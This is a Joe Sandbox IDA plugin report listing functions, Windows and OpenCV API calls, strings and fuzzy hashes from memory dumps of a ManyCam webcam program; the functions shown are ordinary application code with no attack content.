Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapcodecvt$??2@??3@wcstol
String ID:
API String ID: 74129304-0
Opcode ID: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
Instruction ID: 6d66b3f1b8e0294eece4e25a7ed8cbe839a85e6d975fee0ec5976f71f30e8fe7
Opcode Fuzzy Hash: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
Instruction Fuzzy Hash: 7E4103B0D05209EFDB14DF94D895BEEBBB0BB48314F20852AE416AB2C0DB756A45CF94

Function 0046C100 Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00569E8C), ref: 0046C121
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C16B
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C17D
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C19E
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080,?,00000000,00000000,00000000), ref: 0046C1DC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
Instruction ID: c9f41260a9b7f310c3a2772d0b559dbbeee8ca943a5465fee336bfd2e85e9abf
Opcode Fuzzy Hash: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
Instruction Fuzzy Hash: E3310DB5A40208BFEB04DF94CC96FAF77B9FB48704F108549F615EB280D675A940DB94

Function 00405E10 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00405E22
cvCreateMat.CXCORE099(00000004,00000004,00000005,00000004,00000004,00000005), ref: 00405E2F

Part of subcall function 004052F0: cvSet.CXCORE099(?,?,?,?,?,?,00000000,?,00401783), ref: 0040530E

cvGEMM.CXCORE099(00000000,?), ref: 00405E67
cvCopy.CXCORE099(00000000,00000000,00000000,00000000,?), ref: 00405E70
cvScaleAdd.CXCORE099(00000000), ref: 00405EC9

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Create$CopyScale
String ID:
API String ID: 461463502-0
Opcode ID: 9b155aa8d9b7d350014ff22c71609d5e50d78062370eef75407f380a65ed93fa
Instruction ID: 243994d87a2382b29a994a3e478baa9f1873f37bc1af83bd278c7c66fdfcfe6b
Opcode Fuzzy Hash: 9b155aa8d9b7d350014ff22c71609d5e50d78062370eef75407f380a65ed93fa
Instruction Fuzzy Hash: 322129B2E0061076D7103B65DC4BB577B68DF40754F410869FE84AB2E2F97289208BD6

Function 00520C30 Relevance: 7.5, APIs: 5, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C38
LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C45
SetEvent.KERNEL32(0000000A,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C60
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?), ref: 00520C6C
LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C76

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEventObjectSingleWait
String ID:
API String ID: 2480823239-0
Opcode ID: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
Instruction ID: 20fc61db396638aa89e1fa09a044bcff496ff3b65396fda0f4d22a802af35d76
Opcode Fuzzy Hash: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
Instruction Fuzzy Hash: 12F05E761002109BD320DB19EC4899BF7B8EFE5731B008A1EF66693760C774A84ADB50

Function 0048B460 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(00000000,00000000,?,0047AE1E), ref: 0048B46C
?resize@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXI@Z.MSVCP80(?,?,0047AE1E), ref: 0048B47E
?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP80(?,0047AE1E), ref: 0048B487
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,0047AE1E), ref: 0048B497
?at@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAA_WI@Z.MSVCP80(00000000,?,0047AE1E), ref: 0048B4A7

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?at@?$basic_string@_?empty@?$basic_string@_?resize@?$basic_string@_?size@?$basic_string@D@2@@std@@D@std@@Myptr@?$basic_string@_U?$char_traits@V?$allocator@
String ID:
API String ID: 4057328569-0
Opcode ID: c7ba979821146be9279d2770a084e86471b0649c4ca3e01649a5b532db9d5204
Instruction ID: d80ad3f19352604951a50fa2e2320d740545fe158bc114347127201c31090748
Opcode Fuzzy Hash: c7ba979821146be9279d2770a084e86471b0649c4ca3e01649a5b532db9d5204
Instruction Fuzzy Hash: 20F05434901208EFDF04DF94E9969ACBBB5FF54301F1040A9E906A7362CB306F54EB94

Function 0042C9B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0042C9E5
_DebugHeapAllocator.LIBCPMTD ref: 0042C9F7

Part of subcall function 0042F960: _invalid_parameter_noinfo.MSVCR80(-0000003E,?,004AB3E0,00000000,0000000A,00000001,744843B1,000000FF,?,004AB79D), ref: 0042F974

Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E198
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E1D1
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E203
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E23C
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E258
Part of subcall function 0042E150: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E2A5

Strings

www.manycam.com, xrefs: 0042CAF2
www.manycam.com, xrefs: 0042CADE

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$DateFormat_invalid_parameter_noinfo
String ID: www.manycam.com$www.manycam.com
API String ID: 553431348-1145362033
Opcode ID: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
Instruction ID: 55a663fd7b0127f2866d6ce172646f00f7e0cf50757378cb7dafc49b07509b25
Opcode Fuzzy Hash: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
Instruction Fuzzy Hash: 47414271A001199BCB08DB99E891BEEB7B5FF48318F54412EE212B7391DB385944CBA9

Function 004AD340 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 004AD389

Part of subcall function 004AC570: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 004AC59F

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

Client %s connected at resolution %dx%d., xrefs: 004AD486
CFileMapping::GetClientInfo, xrefs: 004AD368
d, xrefs: 004AD3FA

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::_clock$AllocatorDebugHeap
String ID: CFileMapping::GetClientInfo$Client %s connected at resolution %dx%d.$d
API String ID: 3697921549-1386559697
Opcode ID: 7fe720bde0584b662ff5a6456fcc0a7a9370bb05cd906dda38ab630ce944b94b
Instruction ID: 7d5e3eb7a6a05b16b4464e10eb127672eeae9fc856bbeaa4b7ff7cd70146af52
Opcode Fuzzy Hash: 7fe720bde0584b662ff5a6456fcc0a7a9370bb05cd906dda38ab630ce944b94b
Instruction Fuzzy Hash: 5E515971D00109DFCB08DB94D892BEEBBB1FB65314F10822EE4126B6D2DB786A05CB95

Function 00473410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 00474150: _DebugHeapAllocator.LIBCPMTD ref: 00474184

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004734D8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004734ED

Strings

Unspecified error., xrefs: 00473445
Success., xrefs: 0047356D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorBase::Concurrency::details::ContextDebugHeapIdentityQueueWork
String ID: Success.$Unspecified error.
API String ID: 1131629171-706436185
Opcode ID: b3f4d17c8da6cdcfc0b6d0ff55324c749d524ae8afab65f8b4ff8dddb847087a
Instruction ID: bc827c14786d1c61271ce0a8054c91633283c620aa6f54ee5145cccaa2d137c5
Opcode Fuzzy Hash: b3f4d17c8da6cdcfc0b6d0ff55324c749d524ae8afab65f8b4ff8dddb847087a
Instruction Fuzzy Hash: BA417071801148EECB04EBD5D956BEEBBB4EF14308F10815EE416771D1EB782B08CBA6

Function 004B1320 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

_Smanip.LIBCPMTD ref: 004B1372

Part of subcall function 00520530: memset.MSVCR80 ref: 00520538

_Smanip.LIBCPMTD ref: 004B1421

Part of subcall function 005204F0: CoTaskMemFree.OLE32(?,?,004B1A46,000000FF,000000FF,?,?,?,?,744843B1), ref: 005204FD

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CGraphMgr::GetCameraResolution, xrefs: 004B1351
vids, xrefs: 004B13DA

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Smanipclock$AllocatorDebugFreeHeapTaskmemset
String ID: CGraphMgr::GetCameraResolution$vids
API String ID: 3774843521-3834299117
Opcode ID: 57f87322dc0667cbc6c92d53d1968dbb6fd63cc6e5eefb218d5141586365d371
Instruction ID: e56a76c056f848615ba6731e9865e0c3898b4e488a6d99c30ba1f2ebbdeffdb9
Opcode Fuzzy Hash: 57f87322dc0667cbc6c92d53d1968dbb6fd63cc6e5eefb218d5141586365d371
Instruction Fuzzy Hash: 45411A70900209DFCB14DF95D991BDEBBB4BF48304F50819EE509AB392DB34AA45CFA4

Function 00418180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,?,0000004E,00000000), ref: 004181E3
SendMessageW.USER32(00000000,?,00000111), ref: 00418234

Part of subcall function 004182A0: GetDlgCtrlID.USER32(?), ref: 004182AD

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Strings

open, xrefs: 00418249

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: open
API String ID: 1383977212-2758837156
Opcode ID: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
Instruction ID: c0f4561a2c49f87f87505e6ad243b5dafbf5b9024aec12e38c733bc4d86155cd
Opcode Fuzzy Hash: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
Instruction Fuzzy Hash: FD313E70A042599FEF08DBA5DC51BFEBBB5BF48304F14415DE506B73C2CA38A9418B69

Function 0040D710 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651

_DebugHeapAllocator.LIBCPMTD ref: 0040D74B

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

Part of subcall function 0040E970: GetWindowRect.USER32(?,?), ref: 0040E981

MoveWindow.USER32(00000064,00000000,00000000,?,?,00000000,?,0053D874,00000000,?,00000499), ref: 0040D7C2

Part of subcall function 0040E950: SendMessageW.USER32(00000000,00000445,?,0040D7DD), ref: 0040E963

Part of subcall function 0040EFF0: SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 0040F008

Part of subcall function 0040E990: SetFocus.USER32(?,?,?,00434E57,?,00000000,?), ref: 0040E99D

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D

Strings

d, xrefs: 0040D765
d, xrefs: 0040D75E

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$AllocatorDebugHeapMessageParentRectSend$FocusInfoItemLongMoveParametersSystem
String ID: d$d
API String ID: 3921613472-195624457
Opcode ID: be6d5f90de31245e1e353859d4c1b30396a498e5700c83b75fcdaf14fb3ee6aa
Instruction ID: 3ca6db3b2f9967b65cd4f0e061b2cad756e61815fc9b19dab2999dc164d22b62
Opcode Fuzzy Hash: be6d5f90de31245e1e353859d4c1b30396a498e5700c83b75fcdaf14fb3ee6aa
Instruction Fuzzy Hash: F3312D71A01109AFDB04DFEDD995FAEB7B6AF48308F14455CF202B72C1CA74AA10CB68

Function 00BC4970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvSeqPop,00C4124F,.\cxdatastructs.cpp,0000054A), ref: 00BC498E

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF37,cvSeqPop,00C4124F,.\cxdatastructs.cpp,0000054C), ref: 00BC49B6

Strings

.\cxdatastructs.cpp, xrefs: 00BC497D, 00BC49A2
cvSeqPop, xrefs: 00BC4987, 00BC49AC

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxdatastructs.cpp$cvSeqPop
API String ID: 483703942-537827223
Opcode ID: 520d9410e2d27bee1ee29b40501e13fbf8b3c1dd5ad5618ddcee3535200a67d7
Instruction ID: 6c5125c69a36e71b6f43739384a113d6061e0a952080b0d64d2f024f0b4a98fc
Opcode Fuzzy Hash: 520d9410e2d27bee1ee29b40501e13fbf8b3c1dd5ad5618ddcee3535200a67d7
Instruction Fuzzy Hash: F321D3727413119FC710DE29C991F127BE5FF55B28F6442EDF4089B386E771DA068A90

Function 0041D690 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

Error, xrefs: 0041D74C
Error opening properties for this camera., xrefs: 0041D751

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: Error$Error opening properties for this camera.
API String ID: 0-2118436274
Opcode ID: 19554b0057f9a520c76bc3dad455c1dc10b7e99a60b9304a2b7680d00d384350
Instruction ID: 147417b0d663a9565f7becfaf8392b6f7256af2672039c8dcafe371fef67c71d
Opcode Fuzzy Hash: 19554b0057f9a520c76bc3dad455c1dc10b7e99a60b9304a2b7680d00d384350
Instruction Fuzzy Hash: 1B212CB0D00208EFDB04EFA5DD92BEEBBB4EB04718F10052EE416A72D1DB786945DB95

Function 00438A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

clock.MSVCR80 ref: 00438AA7
_DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Strings

>>> Entering: %s, xrefs: 00438A91
ob@, xrefs: 00438A20

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclockfflushfwprintf
String ID: >>> Entering: %s$ob@
API String ID: 1338021872-1849792878
Opcode ID: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
Instruction ID: e5c4b020fe9bb3bd421ac8dd4bd2dede87d7f0cb66a8b34f549f2a89e30843bb
Opcode Fuzzy Hash: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
Instruction Fuzzy Hash: 9D216075900209AFDB04EF94C942AEEBB74FF44718F10852DF816A73C1DB746A04CBA5

Function 00BC70F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvNextTreeNode,NULL iterator pointer,.\cxdatastructs.cpp,00000F46), ref: 00BC7112

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

Strings

.\cxdatastructs.cpp, xrefs: 00BC7101
cvNextTreeNode, xrefs: 00BC710B
NULL iterator pointer, xrefs: 00BC7106

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

